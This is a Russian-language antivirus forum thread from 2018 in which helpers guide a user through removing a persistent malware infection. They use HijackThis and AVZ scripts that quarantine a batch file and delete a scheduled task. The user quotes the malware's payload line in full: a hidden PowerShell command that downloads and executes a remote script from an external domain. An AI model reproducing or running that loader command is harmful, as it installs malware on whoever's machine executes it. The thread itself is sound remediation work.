Евгений Овсянников 0 Опубликовано 14 июля, 2018 Share Опубликовано 14 июля, 2018 проблема та же. третьи сутки бьюсь с attrib.exe , который грузит все шесть ядер до 90%. Из диспетчера выловил, что создаются батники в win/tempскрипт 8 от AVZ выполнил, архив на сайте загрузил (MD5 карантина: 570C9E77CC4490A57626F8A801CCC5C5)результат проверкичто делать дальше? Сообщение от модератора Mark D. Pearlstone Перемещено из темы лог хайджекштатный NOD32, Kaspersky Virus Removal Tool 2015 и Dr.Web CureIt!. проблему не решили.SpyHunter тоже не помогает. AdwCleanerC00.txt AdwCleanerS00.txt AdwCleanerS01.txt hijackthis.log Цитата Ссылка на сообщение Поделиться на другие сайты
Mark D. Pearlstone 1 704 Опубликовано 14 июля, 2018 Share Опубликовано 14 июля, 2018 Порядок оформления запроса о помощи Цитата Ссылка на сообщение Поделиться на другие сайты
Евгений Овсянников 0 Опубликовано 14 июля, 2018 Автор Share Опубликовано 14 июля, 2018 (изменено) автологер прилагаю CollectionLog-2018.07.14-11.48.zip Изменено 14 июля, 2018 пользователем Евгений Овсянников Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 14 июля, 2018 Share Опубликовано 14 июля, 2018 C:\Program Files\Common Files\restore_rev.bat вам знаком? "Пофиксите" в HijackThis: O4 - HKCU\..\RunOnce: [Application Restart #3] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --restore-last-session -- http://ekaterinburg.hh.ru/vacancy/12482091?&utm_medium=email&utm_source=email&utm_campaign=vacancies_selected&utm_content=2015_01_15&loginkey=Fx3kW6m1kmDDGNw6wdeLzYg1n4CNGIiIgZZs9w75Miba7Bwwbg-- O4-32 - HKLM\..\Run: [AsioReg] = C:\Windows\system32\REGSVR32.exe /S CTASIO.DLL O4-32 - HKLM\..\Run: [AsioThk32Reg] = C:\Windows\system32\REGSVR32.EXE /S CTASIO.DLL O9 - Button: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file) O9 - Tools menu item: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file) O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers: MailRuCloudIconOverlay0 - {64A9418A-B6B1-4112-B75C-E61633C9A31F} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers: MailRuCloudIconOverlay1 - {6A2E142B-EA63-433A-AC05-5223CBD26E65} - (no file) O21-32 - HKLM\..\ShellIconOverlayIdentifiers: MailRuCloudIconOverlay2 - {6AFCC535-2F12-4F50-9F0A-1CF856CFC95D} - (no file) соберите свежие логи Автологером. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Евгений Овсянников 0 Опубликовано 15 июля, 2018 Автор Share Опубликовано 15 июля, 2018 (изменено) вам знаком? нет внутри вот это powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command "iex ((new-object net.webclient).DownloadString('http://77.super-me.online/files/restore_rev.ps1'))" "Пофиксите" в HijackThis: проблема осталась CollectionLog-2018.07.15-16.34.zip Изменено 15 июля, 2018 пользователем Евгений Овсянников Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 июля, 2018 Share Опубликовано 15 июля, 2018 Здравствуйте!Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); QuarantineFile('C:\Program Files\Common Files\restore_rev.bat', ''); DeleteFile('C:\Program Files\Common Files\restore_rev.bat', '64'); ExecuteFile('schtasks.exe', '/delete /TN "RestoreRevTask" /F', 0, 15000, true); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится. - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.comПолученный ответ сообщите здесь (с указанием номера KLAN) Повторите логи по правилам. Для повторной диагностики запустите снова Autologger. 1 Цитата Ссылка на сообщение Поделиться на другие сайты
Евгений Овсянников 0 Опубликовано 15 июля, 2018 Автор Share Опубликовано 15 июля, 2018 (изменено) Полученный ответ сообщите здесь (с указанием номера KLAN) KLAN-8402220766 Благодарим за обращение в Антивирусную Лабораторию Присланные вами файлы были проверены в автоматическом режиме. В антивирусных базах информация по присланным вами файлам отсутствует: restore_rev.bat Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте. Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него. Антивирусная Лаборатория, Kaspersky Lab HQ "Ленинградское шоссе 39A/3, Москва, 125212, Russia Телефон/Факс: + 7 (495) 797 8700 http://www.kaspersky.comhttps://www.securelist.com" проблема решена. в ДЗ процесса больше нет. CollectionLog-2018.07.15-18.14.zip Изменено 15 июля, 2018 пользователем Евгений Овсянников Цитата Ссылка на сообщение Поделиться на другие сайты
regist 617 Опубликовано 15 июля, 2018 Share Опубликовано 15 июля, 2018 AdwCleaner, версия 7.2.1 [20180714]-->"C:\Program Files (x86)\AdwCleaner\unins000.exe" деинсталируйте, тем более вы скачали левый инсталятор в фейкового сайта. Выполните скрипт в AVZ при наличии доступа в интернет: var LogPath : string; ScriptPath : string; begin LogPath := GetAVZDirectory + 'log\avz_log.txt'; if FileExists(LogPath) Then DeleteFile(LogPath); ScriptPath := GetAVZDirectory +'ScanVuln.txt'; if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!'); exit; end; end; if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false) end. После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему. Выполните рекомендации после лечения. 2 Цитата Ссылка на сообщение Поделиться на другие сайты
Евгений Овсянников 0 Опубликовано 15 июля, 2018 Автор Share Опубликовано 15 июля, 2018 Выполните скрипт в AVZ при наличии доступа в интернет: Поиск критических уязвимостей Уязвимость в MSXML делает возможным удаленное выполнение кода https://www.microsoft.com/downloads/details.aspx?FamilyID=7dabf372-4b31-4c9e-a660-4e0f4a65db04 Запускайте обновление от имени Администратора Обновление для системы безопасности Microsoft Office Word 2007 https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=a58f32c8-e216-4b89-89a8-6ccfdfa399c5 Обновление для системы безопасности Microsoft Office Word 2003 Compatibility Pack https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=0ea0f80e-1c6b-4e92-9ce0-4b18081bd536 Обнаружено уязвимостей: 3 Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.